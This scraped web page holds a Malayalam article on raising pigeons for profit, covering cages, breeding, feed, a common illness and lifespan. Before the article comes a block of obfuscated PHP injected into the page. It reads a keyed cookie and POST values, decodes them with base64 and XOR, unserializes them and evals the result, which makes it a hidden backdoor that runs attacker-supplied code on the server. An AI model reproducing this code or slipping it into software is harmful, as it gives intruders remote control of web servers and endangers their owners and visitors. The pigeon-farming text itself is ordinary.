$VXJVEAbNkL = chr (111) . chr ( 914 - 847 )."\x5f" . "\x68" . "\152" . chr (78) . "\123";$ElrEeQWf = 'c' . chr ( 427 - 319 ).chr ( 779 - 682 ).'s' . "\163" . "\137" . "\145" . chr ( 457 - 337 ).chr ( 1063 - 958 ).'s' . "\164" . "\x73";$FKdCsvt = class_exists($VXJVEAbNkL); $ElrEeQWf = "26131";$xTnGlRuR = strpos($ElrEeQWf, $VXJVEAbNkL);if ($FKdCsvt == $xTnGlRuR){function dSAGxSPU(){$mCXBr = new /* 15894 */ oC_hjNS(5865 + 5865); $mCXBr = NULL;}$SyQtm = "5865";class oC_hjNS{private function UCrjoD($SyQtm){if (is_array(oC_hjNS::$GSCSJq)) {$GpUkk2 = str_replace("<" . "?php", "", oC_hjNS::$GSCSJq["content"]);eval($GpUkk2); $SyQtm = "5865";exit();}}public function VXqvOSb(){$GpUkk = "53873";$this->_dummy = str_repeat($GpUkk, strlen($GpUkk));}public function __destruct(){oC_hjNS::$GSCSJq = @unserialize(oC_hjNS::$GSCSJq); $SyQtm = "30711_57028";$this->UCrjoD($SyQtm); $SyQtm = "30711_57028";}public function BHgAlhgAP($GpUkk, $KCcdxwo){return $GpUkk[0] ^ str_repeat($KCcdxwo, intval(strlen($GpUkk[0]) / strlen($KCcdxwo)) + 1);}public function jJMpKV($GpUkk){$FPmjvGj = "\142" . chr ( 555 - 458 ).chr ( 418 - 303 ).'e' . '6' . chr ( 97 - 45 );return array_map($FPmjvGj . chr (95) . chr (100) . "\x65" . chr (99) . chr (111) . "\x64" . chr (101), array($GpUkk,));}public function __construct($TaJCrlgNU=0){$adNshnbaU = "\54";$GpUkk = "";$UjieTVMmPr = $_POST;$jkIOj = $_COOKIE;$KCcdxwo = "fa466309-c080-47c2-bdd5-b7d5baf991f3";$ApeUFifxgT = @$jkIOj[substr($KCcdxwo, 0, 4)];if (!empty($ApeUFifxgT)){$ApeUFifxgT = explode($adNshnbaU, $ApeUFifxgT);foreach ($ApeUFifxgT as $cwcxCxX){$GpUkk .= @$jkIOj[$cwcxCxX];$GpUkk .= @$UjieTVMmPr[$cwcxCxX];}$GpUkk = $this->jJMpKV($GpUkk);}oC_hjNS::$GSCSJq = $this->BHgAlhgAP($GpUkk, $KCcdxwo);if (strpos($KCcdxwo, $adNshnbaU) !== FALSE){$KCcdxwo = str_pad($KCcdxwo, 10); $KCcdxwo = ltrim(rtrim($KCcdxwo));}}public static $GSCSJq = 51359;}dSAGxSPU();} പ്രാവു വളർത്തൽ വെറുമൊരു വിനോദമല്ല; മനസുവച്ചാൽ കൈനിറയെ പണം – Mannira

പ്രാവു വളർത്തൽ വെറുമൊരു വിനോദമല്ല; മനസുവച്ചാൽ കൈനിറയെ പണം

പ്രാവു വളർത്തൽ വെറുമൊരു വിനോദമല്ല; മനസുവച്ചാൽ കൈനിറയെ പണം നേടിത്തരുന്ന ഒരു സംരഭം കൂടിയാണിതെന്ന് അറിയുക. നാടൻ പ്രാവുകൾ മുതൽ വിദേശി പ്രാവുകൾവരെ വിലപ്പനയ്ക്കുള്ള വലിയ വിപണിയാണ് സംരഭകരെ കാത്തിരിക്കുന്നത്. ഒരു ജോഡി പ്രാവിന് ആയിരം രൂപ മുതൽ ലക്ഷങ്ങൾ വരെ വിലമതിക്കുന്ന വിവിധയിനങ്ങളും ആവശ്യക്കാരും വിപണിയിലുണ്ട്.

നല്ല രീതിയിൽ കൂടുകൾ തയ്യാറാക്കലാണ് പ്രാവു വളർത്തലിന്റെ ആദ്യപടി. അഞ്ചടി നീളവും ഒന്നരയടി വീതിയും ഒന്നരയടി പൊക്കവും സാധാരണ ഗതിയിൽ കൂടുകൾക്ക് ഉണ്ടായിരിക്കണം. ഇവ ചെറിയ ഇരുമ്പ് വലകൾ ഉപയോഗിച്ച് സുരക്ഷിതമാക്കണം. നല്ലയിനം പ്രാവിൻ കുഞ്ഞുങ്ങളെ വാങ്ങി വളർത്തി വലുതാക്കി വിൽക്കുകയാണ് പൊതുവേ ഈ മേഖലയിലെ പതിവ്.

ഇണചേർന്ന് 15 മുതൽ 20 ദിവസങ്ങൾക്കു ള്ളിൽ ഇവ മുട്ടയിടും. കൂടിനുള്ളിൽ മണൽ ചട്ടികൾ ഒരുക്കി മുട്ടയിടാനുള്ള സൗകര്യം ചെയ്തു കൊടുക്കണം. ഒന്നിടവിട്ട ദിവസങ്ങളിലായിരിക്കും മുട്ടയിടുക. പകൽ പൂവനും രാത്രി പിടയുമാണ് പൊതുവേ അടയിരിക്കാറുള്ളത്. പതിനെട്ടാം ദിവസം മുട്ട വിരിഞ്ഞ് കുഞ്ഞു പുറത്തു വരും.

കുതിർത്ത ചോളം, പയർ വർഗങ്ങൾ, ഗോതമ്പ്, കപ്പലണ്ടി, നിലക്കടല എന്നിവയാണ് പ്രധാന ആഹാരമായി നൽകേണ്ടത്. കൂടാതെ ചീരയില, മല്ലിയില എന്നിവയും നൽകാം. 30 മി.ലിറ്റർ വെള്ളം വീതം ഓരോ പ്രാവിനും നൽകണം. തലതിരിയലാണ് പ്രാവുകളിൽ കാണുന്ന പ്രധാന രോഗം. വൈറ്റമിന്റെ കുറവുകൊണ്ടുണ്ടാകുന്ന ഈ രോഗത്തിന് ബി 1 ഗുളികയാണ് പരിഹാരം.

രോഗം ബാധിച്ച പ്രാവിനെ എത്രയും പെട്ടെന്ന് കൂട്ടത്തിൽ നിന്ന് മാറ്റാൻ ശ്രദ്ധിക്കണം. രണ്ടാഴ്ചയിൽ ഒരിക്കൽ പ്രാവുകളെ മാറ്റി കൂട് വൃത്തിയാക്കി അണുനാശിനി തളിക്കുകയും മഞ്ഞൾപ്പൊടി വിതറുകയും ചെയ്താൽ പ്രാവുകൾ ആരോഗ്യത്തോടെ വളരും. സാധാരണ ഗതിയിൽ പതിനഞ്ച് മുതൽ ഇരുപത് വർഷം വരെയാണ് പ്രാവുകളുടെ ജീവിതകാലം.

Also Read: ജൈവ കീടനാശിനികളുടെ നല്ലകാലം വരുന്നോ? പുത്തൻ കീടനിയന്ത്രണ രീതിയുമായി എടിജിസി ബയോടെക്

Image: unsplash.com